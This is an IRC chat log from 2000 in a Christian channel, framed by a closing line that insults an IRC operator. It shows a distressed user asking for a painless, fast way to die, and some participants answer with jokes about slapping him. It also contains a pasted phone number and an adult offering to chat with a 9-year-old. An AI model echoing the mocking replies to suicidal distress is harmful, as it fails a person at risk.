[02:34] *** LARING (IRCop@208.150.130.9) has joined #CHristian
[02:34] <AceRadio> Welcome to #Christian, laring
[02:35] *** LARING (IRCop@208.150.130.9) has left #CHristian
[02:35] *** space[AW] (spacejam@spacejam.linuxroot.net) has joined #CHristian
[02:35] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:35] <AceRadio> Welcome to #Christian, space[aw]
[02:35] <AceRadio> wb jamie
[02:36] <space[AW]> AceRadio hi.. thanx
[02:36] *** space[AW] is now known as spaceJAM
[02:37] *** aLiCh|gRL (~oink@210.23.210.216) has joined #CHristian
[02:37] <TopTed> oh hum...
[02:37] <AceRadio> Welcome to #Christian, alichigrl
[02:37] <AceRadio> 1:39 am cdt
[02:38] *** AgnusDei (Pucelle@host-216-76-172-44.msy.bellsouth.net) has joined #CHristian
[02:38] *** aLiCh|gRL (~oink@210.23.210.216) Quit (Ping timeout for aLiCh|gRL[210.23.210.216])
[02:38] <Shaina`> it's 2:38am here
[02:38] <AceRadio> Welcome to #Christian, agnusdei
[02:39] <AgnusDei> good evening ace
[02:39] <TopTed> !kjv 1john 2:15
[02:39] <logos3> TopTed: 1John 2:15 "15 Love not the world, neither the things that are in
the world. If any man love the world, the love of the Father is not in him." (KJV)
* Timer 100 halted
* Timer 101 halted
[02:39] * Raid has returned ( Auto-Away: Not here ) - on 02:39:14 @ 09/09/2000 - Away 17
minutes.
[02:39] <AceRadio> wb raid
[02:39] <Raid> crud
[02:39] <Raid> I will sleep soon.
[02:39] <Raid> but first, must smoke this cig.
[02:40] <konfused> brr tis cold here
[02:41] <AceRadio> konfused- grab a blanket
[02:41] <konfused> i have one :o
[02:41] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) has joined #CHristian
[02:41] <AceRadio> Welcome to #Christian, sunshinem
[02:42] *** WingNut (psa23@A020-0450.TULS.splitrock.net) Quit (Ping timeout for
WingNut[A020-0450.TULS.splitrock.net])
[02:42] *** Disconnected
Session Close: Sat Sep 09 02:42:36 2000

Session Start: Sat Sep 09 12:25:22 2000


[12:25] *** Now talking in #CHristian
[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC (LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has joined #CHristian
[12:26] *** Txico (peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping timeout for
Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the channel, all your machines are going to be
scanned so be prepared
[12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script off.
[12:28] <Raid> CiCi: I didn't want to risk having to explain what netbios open shares are
again. ;p
[12:28] *** hunnynut (babyliciou@1Cust36.tnt3.league-city.tx.da.uu.net) Quit
[12:29] *** prophecy_ (x-stream.c@freedu-132-79.libertysurf.co.uk) Quit (Leaving)
[12:29] <anyways> anyone else under 15 on this channel?
[12:29] *** Dmel (NA@AC9D6C60.ipt.aol.com) Quit (Leaving)
[12:33] *** SixSteps (unashamed2@dyn203.mm.den.viawest.net) has joined #CHristian
[12:33] *** SixSteps (unashamed2@dyn203.mm.den.viawest.net) has left #CHristian
[12:33] * patience_ will bbl
[12:34] <anyways> any girls wanna chat to Jasmine?
[12:37] <quietloop> is this a flirt channel
[12:37] <anyways> lol
[12:37] <anyways> Jasmine is 9 and she's a girl wanting to chat to another girl her own age
[12:38] <anyways> do you call that flirting?
[12:38] <anyways> :)
[12:38] *** Philip15 (CrAzzy@202.151.216.10) has joined #CHristian
[12:38] <CiCi> I"m not her age, but I'll chat with her if she wants
[12:39] <LC> If jasmine wants to talk to a Baptist preacher...old enough to be her dad...or
grand dad...I will be glad to as well
[12:40] <Raid> lol
[12:40] <anyways> :)
[12:41] <anyways> Thanks for the offer
[12:42] <Raid> /msg LC I thought I'd help you out. Heres my number so your lawyer can
contact me. (310) 883-2304 Ext 620
[12:42] <Raid> doh
[12:42] <Raid> stupid paster
[12:43] <Raid> if im not there, leave a msg with a number; I'll call you back on my dime.
[12:44] * Raid is away since 12:44:05 - 09/09/2000 ( Must find food... Wheres that burger
king? ) - Msgs will be saved.
[12:44] *** patience_ is now known as pataway
[12:44] *** ontario_2 (FlAmEs@d226-92-152.home.cgocable.net) has joined #CHristian
[12:45] *** ontario_2 (FlAmEs@d226-92-152.home.cgocable.net) has left #CHristian
[12:45] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) has joined #CHristian
[12:45] *** Philip15 (CrAzzy@202.151.216.10) Quit (Ping timeout for Philip15)
[12:48] *** Nell` (Piglet@pool-209-138-214-116.dlls.grid.net) has joined #CHristian
[12:48] *** Nell` (Piglet@pool-209-138-214-116.dlls.grid.net) Quit (Wishing you peace, love
and Souuuuuuuulll train! - Don Cornelius)
[12:48] *** kosmos (~Andromeda@p13-max7.syd.ihug.com.au) has joined #CHristian
[12:49] *** ecomaster (t@A010-0085.MCLN.splitrock.net) has joined #CHristian
[12:49] *** LC (LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has left #CHristian (Peace
& Protection 4.00 FINAL BETA)
[12:49] *** ecomaster is now known as eminemx
[12:49] <eminemx> hello
[12:49] <eminemx> I need help
[12:49] <anyways> with what?
[12:49] <eminemx> I feel awful
[12:50] <eminemx> I just found out my girlfriend has been cheating on me...I need some
direction
[12:50] <Elijah_> ouch...i'm sorry. :(
[12:50] <anyways> oh dear
[12:50] <anyways> I'm very sorry for you
[12:51] <eminemx> I feel like dying
[12:51] <anyways> That is tough
[12:51] <eminemx> I know she is confused
[12:51] <Elijah_> been there, done that. :(
[12:51] <anyways> are you a christian and is your g/f?
[12:51] <eminemx> I am ...she is not =(
[12:52] * kosmos -------(o<----(o<----(o<-
[12:52] *** aphrael (phumba@j39.kch20.jaring.my) Quit (Leaving)
[12:54] <eminemx> I want to die!
[12:54] <eminemx> but I dont know how
[12:54] <eminemx> painless
[12:54] <eminemx> fast
[12:54] * kosmos slaps eminemx around a bit with a Pirahna
[12:54] <quietloop> dying is easy ... living is hard
[12:55] <pataway> (((((((((( eminemx ))))))))))
[12:55] <quietloop> i want to live
[12:55] <quietloop> easy is no goot
[12:55] <anyways> hey, there's tons of things I could tell you right now, but I don't think
they're things you want to hear just now
[12:55] <eminemx> what
[12:55] <eminemx> please say something
[12:55] <anyways> well
[12:55] <eminemx> I am crying like a d*** baby!
[12:55] <pataway> dying wont solve anything
[12:55] * kosmos picks up the nearest cement mixer and slams it on eminemx's head.
[12:55] <quietloop> crying is goot
[12:55] <pataway> kosmos you7re not helpin
[12:55] *** Disconnected
Session Close: Sat Sep 09 13:13:06 2000

These text files comprise the war with Undernet IRCop CiCi
so far. As you can see by reading the files yourself, She isn't
qualified for her position. She be way too dumb.
